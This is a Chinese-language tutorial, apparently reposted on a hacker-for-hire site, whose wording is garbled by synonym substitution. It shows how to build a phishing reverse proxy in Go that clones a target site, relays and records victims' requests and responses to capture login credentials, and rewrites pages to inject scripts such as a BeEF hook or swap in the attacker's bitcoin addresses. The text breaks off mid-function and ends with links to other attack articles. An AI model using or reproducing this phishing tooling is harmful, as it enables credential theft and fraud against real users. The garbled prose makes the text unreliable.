在Go中运用反向署理进行 *** 垂钓测验

访客4年前关于黑客接单1315

关于一个进犯者来说,要想施行一次 *** 垂钓进犯,往往需求做很多的准备作业。例如建立垂钓站点,诱惑受害者上钩,捕获受害者的登录凭据等。为了防止这些冗杂的进程,本文我将教咱们运用Go自动化这些进程。
完好的代码和运用说明能够在Github检查:https://github.com/JonCooperWorks/judas

署理被用来垂钓TechOnRoad用户。你能看出它们之间的不同吗?
运用署理进行 *** 垂钓
咱们的署理需求接纳来自受害者的恳求,并在发送到方针网站之前重写它们。Go有着许多在原生层面临并发编程进行支撑的优异特性,比方Goroutines、Channels等。咱们建立了一个简略的TCP侦听器,spawn了一个新的goroutine来处理每个传入的衔接和一个goroutine worker来处理恳求和呼应。成果经过channel从恳求处理goroutine传递给worker。
// HTTPTransaction represents a complete request - response flow.
type HTTPTransaction struct {
  Request  *http.Request
  Response *http.Response
}
// PhishingProxy proxies requests between the victim and the target, queuing requests and responses for further processing.
type PhishingProxy struct {
  client               *http.Client
  targetURL            *url.URL
  responseTransformers []ResponseTransformer
}
func main() {
        // ... flag parsing and whatnot
        phishingProxy := &PhishingProxy{
    client:               client,
    targetURL:            u,
    responseTransformers: responseTransformers,
  }
  transactions := make(chan *HTTPTransaction)
  go processTransactions(transactions)
  for {
    conn, err := server.Accept()
    if err != nil {
      log.Println("Error when accepting request,", err.Error())
    }
    go phishingProxy.HandleConnection(conn, transactions)
  }
}
因为Go的优异规范库,恳求处理十分简练。http包供给ReadRequest办法,用于解析从衔接中读取数据的恳求。
defer conn.Close()
reader := bufio.NewReader(conn)
request, err := http.ReadRequest(reader)
if err != nil {
  log.Println("Error parsing request:", err.Error())
  return
}
将一切内容解析成Golang http.Request后,咱们将它传递给方针。署理需求重写来自受害者的HTTP头,以防止方针站点衔接中止,特别是主机头和URL。
request.URL.Scheme = p.targetURL.Scheme
request.URL.Host = p.targetURL.Host
request.Host = p.targetURL.Host
request.RequestURI = ""
resp, err := p.client.Do(request)
if err != nil {
  log.Println("Proxy error:", err.Error())
  return
}
在署理上运用HTTP客户端,咱们建议恳求并保证恳求成功。
一旦咱们得到呼应,咱们运用传递给署理的ResponseTransformers(后面会具体介绍)转化它,运用规范库httputil.DumpResponse函数将呼应转化为字节,并将恳求和呼应发送给goroutine worker之后处理。
for _, transformer := range p.responseTransformers {
  transformer.Transform(resp)
}
modifiedResponse, err := httputil.DumpResponse(resp, true)
if err != nil {
  log.Println("Error converting requests to bytes:", err.Error())
  return
}
_, err = conn.Write(modifiedResponse)
if err != nil {
  log.Println("Error responding to victim:", err.Error())
  return
}
transactions
咱们经过一个channel将HTTP业务传递给worker,以加速咱们的操作进程防止受害者发作某些过错。
只需指向该署理,就能完美克隆方针网站。
// ResponseTransformer modifies a response in any way we see fit, such as inserting extra JavaScript.
type ResponseTransformer interface {
  Transform(response *http.Response) error
}
ResponseTransformer答应你修正呼应。咱们能够用它来任何想做的作业,例如将自界说JavaScript注入到页面,或许将比特币地址替换成咱们自己的。这关于那些在默许署理中无法100%作业的网站也很有用。
JavaScriptInjectionTransformer运用GoQuery将HTML呼应解析到DOM树中,并运用咱们传递给transformer的URL注入脚本标签。咱们能够运用它来注入BeEF hook或绕过网站的安全防护。
// JavaScriptInjectionTransformer holds JavaScript filename for injecting into response.
type JavaScriptInjectionTransformer struct {
  javascriptURL string
}
// Transform Injects JavaScript into an HTML response.
func (j JavaScriptInjectionTransformer) Transform(response *http.Response) error {

[1] [2]  黑客接单网

相关文章

缝缝补补的WebLogic:绕过的艺术

前语 现在Weblogic在全球的使用量占居前列,据统计,在全球范围内对互联网敞开Weblogic服务的财物数量多达35382台,其间归属我国区域的财物数量为10562台。假如迸发一个Weblogic...

新手攻略:DVWA-1.9全等级教程之CSRF

现在,最新的DVWA现已更新到1.9版别(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版别,并且没有针对DVWA high等级的教程,因而萌发了一个编撰新手教程的主意,过错...

“神起”僵尸网络的诱捕与反击(上)

2019年5月中旬,蜜罐体系监测到了一同进犯事情,引起了咱们的留意,小伙伴们敏捷跟进分析,并经过技术手段拿下黑客操控端服务器,发现黑客运用了一款名为“神起ddos集群”的软件,操控了3000+的僵尸网...

用Google破解Google的ReCaptchav2 验证码

这是一个名叫ReBreakCaptcha的逻辑缝隙,而这个缝隙将答应你轻松地绕过网站所选用的GoogleReCaptcha v2验证码。 技能概览 早在2019年,我就开端研讨怎么才干绕过Google...

PHP中该怎样避免SQL注入?

问题描述: 假如用户输入的数据在未经处理的情况下刺进到一条SQL查询句子,那么运用将很可能遭受到SQL注入进犯,正如下面的比如: $unsafe_variable = $_POST['user_in...

一个登陆框引起的血案

客户给的测验规模,或许挖众测时,许多时分都只要一个简略的登陆框,想起最初的苦逼的我,只能去测测爆炸弱口令,并且仍是指定用户名爆炸暗码这种,当真是苦不堪言; 文章内容很简略,可是仍是想共享一波,送给向我...